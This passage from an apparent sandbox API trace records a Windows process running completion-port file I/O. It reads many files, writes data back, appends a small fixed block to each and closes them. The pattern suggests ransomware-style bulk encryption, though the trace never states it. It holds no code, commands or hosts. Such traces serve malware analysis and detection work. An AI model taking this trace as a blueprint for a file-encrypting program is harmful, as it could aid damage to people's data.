lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0155.564] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0155.564] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.564] WriteFile (in: hFile=0x65c, lpBuffer=0x2880094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020 | out: lpBuffer=0x2880094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020) returned 1 [0155.578] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.578] WriteFile (in: hFile=0x658, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x9d03, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020) returned 1 [0155.581] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.581] ReadFile (in: hFile=0x658, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0155.581] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0155.581] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0155.581] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.581] WriteFile (in: hFile=0x658, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020) returned 1 [0155.584] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.584] CloseHandle (hObject=0x658) returned 1 [0155.585] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0155.585] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.963] ReadFile (in: hFile=0x65c, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2910020) returned 1 [0155.979] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.979] ReadFile (in: hFile=0x674, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x41f0020) returned 1 [0155.980] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.980] ReadFile (in: hFile=0x658, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4670020) returned 1 [0155.980] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.980] ReadFile (in: hFile=0x61c, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4790020) returned 1 [0155.980] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.980] ReadFile (in: hFile=0x640, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x48b0020) returned 1 [0155.981] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.981] ReadFile (in: hFile=0x648, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x49d0020) returned 1 [0155.981] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.981] ReadFile (in: hFile=0x66c, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4af0020) returned 1 [0155.982] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.982] ReadFile (in: hFile=0x638, lpBuffer=0x4c10124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4c10020) returned 1 [0155.982] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.982] ReadFile (in: hFile=0x620, lpBuffer=0x4d30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4d30020) returned 1 [0155.982] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.982] WriteFile (in: hFile=0x65c, lpBuffer=0x2910124, nNumberOfBytesToWrite=0x94bc, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2910020) returned 0x0 [0156.000] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.001] WriteFile (in: hFile=0x658, lpBuffer=0x4670124, nNumberOfBytesToWrite=0xedb0, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020) returned 0x0 [0156.006] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.006] WriteFile (in: hFile=0x640, lpBuffer=0x48b0124*, nNumberOfBytesToWrite=0x17104, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x48b0020) returned 1 [0156.029] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.029] WriteFile (in: hFile=0x620, lpBuffer=0x4d30124*, nNumberOfBytesToWrite=0x1b24, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4d30020) returned 1 [0156.037] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.037] WriteFile (in: hFile=0x674, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020) returned 1 [0156.042] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.044] WriteFile (in: hFile=0x66c, lpBuffer=0x4af0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4af0020) returned 1 [0156.071] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.071] CloseHandle (hObject=0x658) returned 1 [0156.081] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0156.081] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.086] WriteFile (in: hFile=0x638, lpBuffer=0x4c10094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4c10020) returned 1 [0156.093] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.093] CloseHandle (hObject=0x638) returned 1 [0156.113] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4c10020) returned 1 [0156.114] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.114] WriteFile (in: hFile=0x620, lpBuffer=0x2880124*, nNumberOfBytesToWrite=0x11af6, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020) returned 1 [0156.117] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.117] ReadFile (in: hFile=0x620, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2880020) returned 0x0 [0156.117] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.117] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0156.117] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.117] WriteFile (in: hFile=0x620, lpBuffer=0x2880094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020 | out: lpBuffer=0x2880094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020) returned 1 [0156.163] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.164] CloseHandle (hObject=0x620) returned 1 [0156.203] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2880020) returned 1 [0156.203] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.203] ReadFile (in: hFile=0x644, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2f30020) returned 1 [0156.203] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.203] WriteFile (in: hFile=0x644, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020) returned 1 [0156.203] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.203] ReadFile (in: hFile=0x644, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0156.203] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.204] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0156.204] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.204] WriteFile (in: hFile=0x644, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020) returned 1 [0156.204] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.204] CloseHandle (hObject=0x644) returned 1 [0156.204] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0156.205] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.416] ReadFile (in: hFile=0x630, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2910020) returned 1 [0156.416] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.416] ReadFile (in: hFile=0x66c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x41f0020) returned 1 [0156.417] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.417] ReadFile (in: hFile=0x67c, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4670020) returned 1 [0156.417] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.417] ReadFile (in: hFile=0x65c, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4790020) returned 1 [0156.417] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.418] WriteFile (in: hFile=0x630, lpBuffer=0x2910124*, nNumberOfBytesToWrite=0x3911, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2910020) returned 1 [0156.418] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.418] WriteFile (in: hFile=0x66c, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x10699, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020) returned 1 [0156.418] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.418] WriteFile (in: hFile=0x67c, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x7175, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020) returned 1 [0156.419] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.419] WriteFile (in: hFile=0x65c, lpBuffer=0x4790124*, nNumberOfBytesToWrite=0x10d29, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4790020) returned 1 [0156.419] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.419] ReadFile (in: hFile=0x630, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2910020) returned 0x0 [0156.419] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.419] ReadFile (in: hFile=0x66c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0156.419] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.419] ReadFile (in: hFile=0x67c, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4670020) returned 0x0 [0156.419] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0156.419] ReadFile (in: hFile=0x65c, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4790020) returned 0x0 [0156.420] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.420] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0156.420] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.420] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0156.420] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0156.420] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0156.420] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, 